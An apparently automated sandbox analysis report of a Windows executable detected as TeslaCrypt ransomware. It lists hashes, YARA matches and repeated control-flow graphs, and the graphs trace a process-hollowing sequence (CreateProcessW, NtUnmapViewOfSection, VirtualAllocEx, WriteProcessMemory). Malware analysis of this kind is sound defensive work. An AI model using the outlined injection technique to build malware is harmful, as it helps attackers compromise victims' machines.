                  Start date:24/03/2021
                  Path:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\AppData\Roaming\mllvvvh.exe'
                  Imagebase:0x400000
                  File size:495616 bytes
                  MD5 hash:4A1D88603B1007825A9C6B36D1E5DE44
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000019.00000001.389132336.0000000000400000.00000040.00020000.sdmp, Author: ReversingLabs
                  • Rule: JoeSecurity_TeslaCrypt, Description: Yara detected TeslaCrypt Ransomware, Source: 00000019.00000002.390167710.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000019.00000002.390167710.0000000000400000.00000040.00000001.sdmp, Author: ReversingLabs

                  Disassembly

                  Code Analysis

                    Execution Graph

                    Execution Coverage:6.2%
                    Dynamic/Decrypted Code Coverage:96.6%
                    Signature Coverage:48%
                    Total number of Nodes:296
                    Total number of Limit Nodes:15

                    Graph


                    Executed Functions

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 8bfb6e92e4e31dd5dd843396850cfa82e4cbde6d03bc6bfe8889a133e051f80c
                    • Instruction ID: 3395de120616cc84340f660c832c4b99777abb78ec828407a73e7f6d9efba9b9
                    • Opcode Fuzzy Hash: 8bfb6e92e4e31dd5dd843396850cfa82e4cbde6d03bc6bfe8889a133e051f80c
                    • Instruction Fuzzy Hash: 4E027C71A18616EEEF1EB7608C12F3D759ABB83B05F045BEDE00F9A181EE744A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 315 2681828-268183e 317 2681840-2681855 315->317 318 2681861-2681879 call 26805f3 315->318 324 268187b-26818c8 call 26805f3 call 2680702 VirtualFree call 26818d5 317->324 325 2681857-2681860 call 268003a 317->325 318->324 339 26818ca-26818cb 324->339 340 2681936-268193b 324->340 325->318 341 268193d-2681948 call 2680702 339->341 342 26818ce-26818d2 339->342 340->341 343 268194d-2681976 call 2681983 341->343 342->343 344 26818d4-26818eb 342->344 368 2681978-2681979 343->368 369 26819e4-26819e9 343->369 348 26818ed-268190c call 268003a 344->348 349 268190e-2681934 call 26805f3 * 2 344->349 348->349 349->340 371 26819eb-26819f6 call 2680702 368->371 372 268197c-2681980 368->372 369->371 373 26819fb-2681a13 call 2681a22 371->373 372->373 374 2681982-2681999 372->374 396 2681a59 373->396 397 2681a16-2681a38 373->397 378 268199b-26819ba call 268003a 374->378 379 26819bc-26819e2 call 26805f3 * 2 374->379 378->379 379->369 400 2681a5b-2681b0d call 26805f3 * 2 call 2680702 call 2681b1b 396->400 397->400 402 2681a3a-2681a54 call 268003a 397->402 427 2681b0f-2681b10 400->427 428 2681b74 400->428 402->396 429 2681b12-2681b13 427->429 430 2681b77-2681b83 427->430 431 2681b75 428->431 432 2681b74 call 26805f3 428->432 433 2681b84 429->433 434 2681b15-2681b31 429->434 437 2681b87-2681bde call 2680702 CreateProcessW call 2681bf2 430->437 435 2681b7a-2681b83 431->435 436 2681b75 call 26805f3 431->436 432->431 433->437 442 2681b33-2681b52 call 268003a 434->442 443 2681b54-2681b75 call 26805f3 * 2 434->443 435->437 436->435 458 2681be0-2681be3 437->458 459 2681c35-2681c39 call 26805f3 437->459 442->443 443->435 463 2681c3b 458->463 464 2681be5-2681c08 458->464 467 2681c3e-2681cc6 call 26805f3 call 2680702 NtUnmapViewOfSection call 2681cb0 459->467 463->467 469 2681c0a-2681c29 call 268003a 464->469 470 2681c2b-2681c34 464->470 488 2681cc8-2681ce7 call 268003a 467->488 489 2681ce9-2681d6e call 26805f3 * 2 call 2680702 VirtualAllocEx call 2681d80 
467->489 469->470 470->459 488->489 511 2681dd9 489->511 512 2681d70-2681d78 489->512 514 2681dda 511->514 515 2681dd9 call 26805f3 511->515 519 2681d7a-2681d7d 512->519 520 2681dc7-2681dda call 26805f3 * 2 512->520 517 2681ddf-2681df3 call 2680702 514->517 518 2681dda call 26805f3 514->518 515->514 522 2681df8-2681e54 WriteProcessMemory call 2681e3e 517->522 518->517 519->522 523 2681d7f-2681d96 519->523 520->517 548 2681e56-2681e75 call 268003a 522->548 549 2681e77-2681ec3 call 26805f3 * 2 call 2680702 522->549 529 2681d98-2681db7 call 268003a 523->529 530 2681db9-2681dc3 523->530 529->530 530->520 548->549
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: 75a0a3093dcc1256c6f6a8c3742ac2abb117dd52b3ba4473718badf47a093bf3
                    • Instruction ID: 1b2368cee17306a58dccfe8ee0742e9a1d8d6eebd8981cdab213c366a28bc598
                    • Opcode Fuzzy Hash: 75a0a3093dcc1256c6f6a8c3742ac2abb117dd52b3ba4473718badf47a093bf3
                    • Instruction Fuzzy Hash: 8EF17A71A18606EEEF1EB7618C12F3D759ABB83B05F045BDDA10F9A181FE784A03C915
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 567 2681836-268183e 568 2681840-2681855 567->568 569 2681861-2681879 call 26805f3 567->569 575 268187b-26818c8 call 26805f3 call 2680702 VirtualFree call 26818d5 568->575 576 2681857-2681860 call 268003a 568->576 569->575 590 26818ca-26818cb 575->590 591 2681936-268193b 575->591 576->569 592 268193d-2681948 call 2680702 590->592 593 26818ce-26818d2 590->593 591->592 594 268194d-2681976 call 2681983 592->594 593->594 595 26818d4-26818eb 593->595 619 2681978-2681979 594->619 620 26819e4-26819e9 594->620 599 26818ed-268190c call 268003a 595->599 600 268190e-2681934 call 26805f3 * 2 595->600 599->600 600->591 622 26819eb-26819f6 call 2680702 619->622 623 268197c-2681980 619->623 620->622 624 26819fb-2681a13 call 2681a22 622->624 623->624 625 2681982-2681999 623->625 647 2681a59 624->647 648 2681a16-2681a38 624->648 629 268199b-26819ba call 268003a 625->629 630 26819bc-26819e2 call 26805f3 * 2 625->630 629->630 630->620 651 2681a5b-2681b0d call 26805f3 * 2 call 2680702 call 2681b1b 647->651 648->651 653 2681a3a-2681a54 call 268003a 648->653 678 2681b0f-2681b10 651->678 679 2681b74 651->679 653->647 680 2681b12-2681b13 678->680 681 2681b77-2681b83 678->681 682 2681b75 679->682 683 2681b74 call 26805f3 679->683 684 2681b84 680->684 685 2681b15-2681b31 680->685 688 2681b87-2681bde call 2680702 CreateProcessW call 2681bf2 681->688 686 2681b7a-2681b83 682->686 687 2681b75 call 26805f3 682->687 683->682 684->688 693 2681b33-2681b52 call 268003a 685->693 694 2681b54-2681b75 call 26805f3 * 2 685->694 686->688 687->686 709 2681be0-2681be3 688->709 710 2681c35-2681c39 call 26805f3 688->710 693->694 694->686 714 2681c3b 709->714 715 2681be5-2681c08 709->715 718 2681c3e-2681cc6 call 26805f3 call 2680702 NtUnmapViewOfSection call 2681cb0 710->718 714->718 720 2681c0a-2681c29 call 268003a 715->720 721 2681c2b-2681c34 715->721 739 2681cc8-2681ce7 call 268003a 718->739 740 2681ce9-2681d6e call 26805f3 * 2 call 2680702 VirtualAllocEx call 2681d80 
718->740 720->721 721->710 739->740 762 2681dd9 740->762 763 2681d70-2681d78 740->763 765 2681dda 762->765 766 2681dd9 call 26805f3 762->766 770 2681d7a-2681d7d 763->770 771 2681dc7-2681dda call 26805f3 * 2 763->771 768 2681ddf-2681df3 call 2680702 765->768 769 2681dda call 26805f3 765->769 766->765 773 2681df8-2681e54 WriteProcessMemory call 2681e3e 768->773 769->768 770->773 774 2681d7f-2681d96 770->774 771->768 799 2681e56-2681e75 call 268003a 773->799 800 2681e77-2681ec3 call 26805f3 * 2 call 2680702 773->800 780 2681d98-2681db7 call 268003a 774->780 781 2681db9-2681dc3 774->781 780->781 781->771 799->800
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: 9502e744bd9e8b834948add4f3d20355d7be1e921f36745f69c6a4dc6e075dcb
                    • Instruction ID: e1cebe2b2623528bcff17fa819511093973fab8fe416483583baec8dc3618cf3
                    • Opcode Fuzzy Hash: 9502e744bd9e8b834948add4f3d20355d7be1e921f36745f69c6a4dc6e075dcb
                    • Instruction Fuzzy Hash: ADF17A71A18606EEEF1EB7618C12F3D759ABB83B05F045BDDA10F9A181FE784A03C915
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 818 2681852-2681855 820 268187b-26818c8 call 26805f3 call 2680702 VirtualFree call 26818d5 818->820 821 2681857-2681879 call 268003a call 26805f3 818->821 839 26818ca-26818cb 820->839 840 2681936-268193b 820->840 821->820 841 268193d-2681948 call 2680702 839->841 842 26818ce-26818d2 839->842 840->841 843 268194d-2681976 call 2681983 841->843 842->843 844 26818d4-26818eb 842->844 868 2681978-2681979 843->868 869 26819e4-26819e9 843->869 848 26818ed-268190c call 268003a 844->848 849 268190e-2681934 call 26805f3 * 2 844->849 848->849 849->840 871 26819eb-26819f6 call 2680702 868->871 872 268197c-2681980 868->872 869->871 873 26819fb-2681a13 call 2681a22 871->873 872->873 874 2681982-2681999 872->874 896 2681a59 873->896 897 2681a16-2681a38 873->897 878 268199b-26819ba call 268003a 874->878 879 26819bc-26819e2 call 26805f3 * 2 874->879 878->879 879->869 900 2681a5b-2681b0d call 26805f3 * 2 call 2680702 call 2681b1b 896->900 897->900 902 2681a3a-2681a54 call 268003a 897->902 927 2681b0f-2681b10 900->927 928 2681b74 900->928 902->896 929 2681b12-2681b13 927->929 930 2681b77-2681b83 927->930 931 2681b75 928->931 932 2681b74 call 26805f3 928->932 933 2681b84 929->933 934 2681b15-2681b31 929->934 937 2681b87-2681bde call 2680702 CreateProcessW call 2681bf2 930->937 935 2681b7a-2681b83 931->935 936 2681b75 call 26805f3 931->936 932->931 933->937 942 2681b33-2681b52 call 268003a 934->942 943 2681b54-2681b75 call 26805f3 * 2 934->943 935->937 936->935 958 2681be0-2681be3 937->958 959 2681c35-2681c39 call 26805f3 937->959 942->943 943->935 963 2681c3b 958->963 964 2681be5-2681c08 958->964 967 2681c3e-2681cc6 call 26805f3 call 2680702 NtUnmapViewOfSection call 2681cb0 959->967 963->967 969 2681c0a-2681c29 call 268003a 964->969 970 2681c2b-2681c34 964->970 988 2681cc8-2681ce7 call 268003a 967->988 989 2681ce9-2681d6e call 26805f3 * 2 call 2680702 VirtualAllocEx call 2681d80 967->989 969->970 970->959 988->989 1011 2681dd9 989->1011 1012 
2681d70-2681d78 989->1012 1014 2681dda 1011->1014 1015 2681dd9 call 26805f3 1011->1015 1019 2681d7a-2681d7d 1012->1019 1020 2681dc7-2681dda call 26805f3 * 2 1012->1020 1017 2681ddf-2681df3 call 2680702 1014->1017 1018 2681dda call 26805f3 1014->1018 1015->1014 1022 2681df8-2681e54 WriteProcessMemory call 2681e3e 1017->1022 1018->1017 1019->1022 1023 2681d7f-2681d96 1019->1023 1020->1017 1048 2681e56-2681e75 call 268003a 1022->1048 1049 2681e77-2681ec3 call 26805f3 * 2 call 2680702 1022->1049 1029 2681d98-2681db7 call 268003a 1023->1029 1030 2681db9-2681dc3 1023->1030 1029->1030 1030->1020 1048->1049
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: e08d23f83d4464460235eeb104c9c910700ea022e7404803ec5bafce6990c29a
                    • Instruction ID: 4e1083a66460255b99a260e3e21966b0dcf64c7171ecd499842b4f57ad197f2d
                    • Opcode Fuzzy Hash: e08d23f83d4464460235eeb104c9c910700ea022e7404803ec5bafce6990c29a
                    • Instruction Fuzzy Hash: 43F18D71A18506EEEF1E77618C12F3D799ABB83B05F045BDDA10F9A181FE744A03C915
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1067 268186d-26818c8 call 26805f3 * 2 call 2680702 VirtualFree call 26818d5 1082 26818ca-26818cb 1067->1082 1083 2681936-268193b 1067->1083 1084 268193d-2681948 call 2680702 1082->1084 1085 26818ce-26818d2 1082->1085 1083->1084 1086 268194d-2681976 call 2681983 1084->1086 1085->1086 1087 26818d4-26818eb 1085->1087 1111 2681978-2681979 1086->1111 1112 26819e4-26819e9 1086->1112 1091 26818ed-268190c call 268003a 1087->1091 1092 268190e-2681934 call 26805f3 * 2 1087->1092 1091->1092 1092->1083 1114 26819eb-26819f6 call 2680702 1111->1114 1115 268197c-2681980 1111->1115 1112->1114 1116 26819fb-2681a13 call 2681a22 1114->1116 1115->1116 1117 2681982-2681999 1115->1117 1139 2681a59 1116->1139 1140 2681a16-2681a38 1116->1140 1121 268199b-26819ba call 268003a 1117->1121 1122 26819bc-26819e2 call 26805f3 * 2 1117->1122 1121->1122 1122->1112 1143 2681a5b-2681b0d call 26805f3 * 2 call 2680702 call 2681b1b 1139->1143 1140->1143 1145 2681a3a-2681a54 call 268003a 1140->1145 1170 2681b0f-2681b10 1143->1170 1171 2681b74 1143->1171 1145->1139 1172 2681b12-2681b13 1170->1172 1173 2681b77-2681b83 1170->1173 1174 2681b75 1171->1174 1175 2681b74 call 26805f3 1171->1175 1176 2681b84 1172->1176 1177 2681b15-2681b31 1172->1177 1180 2681b87-2681bde call 2680702 CreateProcessW call 2681bf2 1173->1180 1178 2681b7a-2681b83 1174->1178 1179 2681b75 call 26805f3 1174->1179 1175->1174 1176->1180 1185 2681b33-2681b52 call 268003a 1177->1185 1186 2681b54-2681b75 call 26805f3 * 2 1177->1186 1178->1180 1179->1178 1201 2681be0-2681be3 1180->1201 1202 2681c35-2681c39 call 26805f3 1180->1202 1185->1186 1186->1178 1206 2681c3b 1201->1206 1207 2681be5-2681c08 1201->1207 1210 2681c3e-2681cc6 call 26805f3 call 2680702 NtUnmapViewOfSection call 2681cb0 1202->1210 1206->1210 1212 2681c0a-2681c29 call 268003a 1207->1212 1213 2681c2b-2681c34 1207->1213 1231 2681cc8-2681ce7 call 268003a 1210->1231 1232 2681ce9-2681d6e call 26805f3 * 2 call 2680702 VirtualAllocEx call 
2681d80 1210->1232 1212->1213 1213->1202 1231->1232 1254 2681dd9 1232->1254 1255 2681d70-2681d78 1232->1255 1257 2681dda 1254->1257 1258 2681dd9 call 26805f3 1254->1258 1262 2681d7a-2681d7d 1255->1262 1263 2681dc7-2681dda call 26805f3 * 2 1255->1263 1260 2681ddf-2681df3 call 2680702 1257->1260 1261 2681dda call 26805f3 1257->1261 1258->1257 1265 2681df8-2681e54 WriteProcessMemory call 2681e3e 1260->1265 1261->1260 1262->1265 1266 2681d7f-2681d96 1262->1266 1263->1260 1291 2681e56-2681e75 call 268003a 1265->1291 1292 2681e77-2681ec3 call 26805f3 * 2 call 2680702 1265->1292 1272 2681d98-2681db7 call 268003a 1266->1272 1273 2681db9-2681dc3 1266->1273 1272->1273 1273->1263 1291->1292
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: a962fcf435c8cb7aa2d987b1e711c5460eb804a3c95d6236ae7c51eea72646d1
                    • Instruction ID: 60ede3d11a720cfa5f388c135211fb79193d058f38f19cbff854daafd955799b
                    • Opcode Fuzzy Hash: a962fcf435c8cb7aa2d987b1e711c5460eb804a3c95d6236ae7c51eea72646d1
                    • Instruction Fuzzy Hash: 1EE17C71A18616EEEF1EB7608C12F3D759ABB83B05F045BDDA10F9A181FE784A03C915
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    [Control-flow graph not reproduced. Entry node 2681892-26818c8; API calls in the graph, in listed order: VirtualFree, CreateProcessW, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory]
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: 20bca425bb6bc7db7330be5875ba669a92a16f5a1a5e7e0a0fd3a0b870a201cb
                    • Instruction ID: 4557db856640f2a596264732bea65a9650f2fe630fc7acbdeae674fc1fa3b878
                    • Opcode Fuzzy Hash: 20bca425bb6bc7db7330be5875ba669a92a16f5a1a5e7e0a0fd3a0b870a201cb
                    • Instruction Fuzzy Hash: 15E16B71A18616EEEF1EB7608C12F3D759ABB83B05F045BDDA10F9A181FE784A03C915
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    [Control-flow graph not reproduced. Entry node 2681899-26818c8; API calls in the graph, in listed order: VirtualFree, CreateProcessW, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory]
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: 0ad37686b73d42f9ba08fb40293c8ae0647b5e22a8e38f5519475c7b8fa4fe0e
                    • Instruction ID: ad636444c265a8fa086bab7fb55b1c78a3a5813db89772ec3a6336cded2fe538
                    • Opcode Fuzzy Hash: 0ad37686b73d42f9ba08fb40293c8ae0647b5e22a8e38f5519475c7b8fa4fe0e
                    • Instruction Fuzzy Hash: 70E16B71A18615EEEF1EB7608C12F3D759ABB83B05F045BDDA10F9A181FE784A03C915
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    [Control-flow graph not reproduced. Entry node 26818d5-26818eb; API calls in the graph, in listed order: CreateProcessW, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory]
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 3e3bddde923975dd5a921fc79769a1c67ba57d68f34712feb84f8e944cdfdcd1
                    • Instruction ID: 1d078ecc69b228449c53b9ebeb12025a9a1071e8ddd034582500317635d8e3bc
                    • Opcode Fuzzy Hash: 3e3bddde923975dd5a921fc79769a1c67ba57d68f34712feb84f8e944cdfdcd1
                    • Instruction Fuzzy Hash: 2CE16A31A18606EEEF1EB7618C12F3D799ABB43B05F045BDDA10F9A181FE784A03C915
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    [Control-flow graph not reproduced. Entry node 26818e3-26818ea; API calls in the graph, in listed order: CreateProcessW, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory]
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 13ac511e3b97632219b7079de2c1df4c8da071d1e6ef7d73833f49ba561644f3
                    • Instruction ID: 930d032f0560f9c73521621fe6a6237e183a42d50e31c78f8f8748a6e2fa2a84
                    • Opcode Fuzzy Hash: 13ac511e3b97632219b7079de2c1df4c8da071d1e6ef7d73833f49ba561644f3
                    • Instruction Fuzzy Hash: F3E18B31A18606EEEF1EB7618C12F3D759ABB83B05F045BDDA10F9A181FE784A03C915
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    [Control-flow graph not reproduced. Entry node 26818ff-2681976; API calls in the graph, in listed order: CreateProcessW, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory]
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 44534e1739558bd4d8e4f40cb5f456b0580b39dccd1a8b05739890721c9f1af5
                    • Instruction ID: 93dd4ecb777389b5d059fbbd57d8ee923c3f5ab2e5d6ce1eec1036735625f3f6
                    • Opcode Fuzzy Hash: 44534e1739558bd4d8e4f40cb5f456b0580b39dccd1a8b05739890721c9f1af5
                    • Instruction Fuzzy Hash: 11D16A31A18606EEEF1EB7618C11F3D799ABB83B05F045BDDA10F9A181FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    [Control-flow graph not reproduced. Entry node 268191a-2681976; API calls in the graph, in listed order: CreateProcessW, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory]
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: ccb24aa4882c60ce5b11b606c8c505bbc98585d82854acb9a1576a98cf526ada
                    • Instruction ID: cb42b0ff89a82a70428d87bcccedc94811c3366278f288a0bdea2b01284130ef
                    • Opcode Fuzzy Hash: ccb24aa4882c60ce5b11b606c8c505bbc98585d82854acb9a1576a98cf526ada
                    • Instruction Fuzzy Hash: 3AD17B31A18606EEEF1EB7618C11F3D799ABB83B05F045BDDA10F9A181FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    [Control-flow graph not reproduced. Entry node 268193f-2681976; API calls in the graph, in listed order: CreateProcessW, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory]
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 6132133a2cb6089e524795df161b0a12a6a8752c04f0a5f07dcc0d578049287a
                    • Instruction ID: 2bb8d234c418e71236d99d44fe6e76c9fbdc635385f8c44d1ed5a231a5b6b47f
                    • Opcode Fuzzy Hash: 6132133a2cb6089e524795df161b0a12a6a8752c04f0a5f07dcc0d578049287a
                    • Instruction Fuzzy Hash: 25D16931A18616EEEF1EB7608C12F3D799ABB43B05F045BDDA10F9A181FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    [Control-flow graph not reproduced. Entry node 2681946-2681976; API calls in the graph, in listed order: CreateProcessW, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory]
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: f495496037286432184363db322da8c27114b56816285eb4577a9db5ad212fdd
                    • Instruction ID: c7bb00a616c73e8a1f5a08431dd7700675d1a1f22cb299fd4ca13c5a31f2318b
                    • Opcode Fuzzy Hash: f495496037286432184363db322da8c27114b56816285eb4577a9db5ad212fdd
                    • Instruction Fuzzy Hash: B4D16932A18606EEEB1EB7608C11F3D799ABB43B05F045BDDA10F9A181FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    [Control-flow graph not reproduced. Entry node 2681963-2681976; API calls in the graph, in listed order: CreateProcessW, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory]
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 963392458-2896586159
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: VirtualAllocEx$e
                    • API String ID: 963392458-3414709220
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02681B9A
                    • NtUnmapViewOfSection.NTDLL ref: 02681C71
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateProcessSectionUnmapView
                    • String ID: VirtualAllocEx$e
                    • API String ID: 1619107759-3414709220
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02681B9A
                    • NtUnmapViewOfSection.NTDLL ref: 02681C71
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocCreateProcessSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx$e
                    • API String ID: 2181670624-3414709220
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtUnmapViewOfSection.NTDLL ref: 02681C71
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx
                    • API String ID: 3336438485-3861807693
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtUnmapViewOfSection.NTDLL ref: 02681C71
                      • Part of subcall function 02681CB0: VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
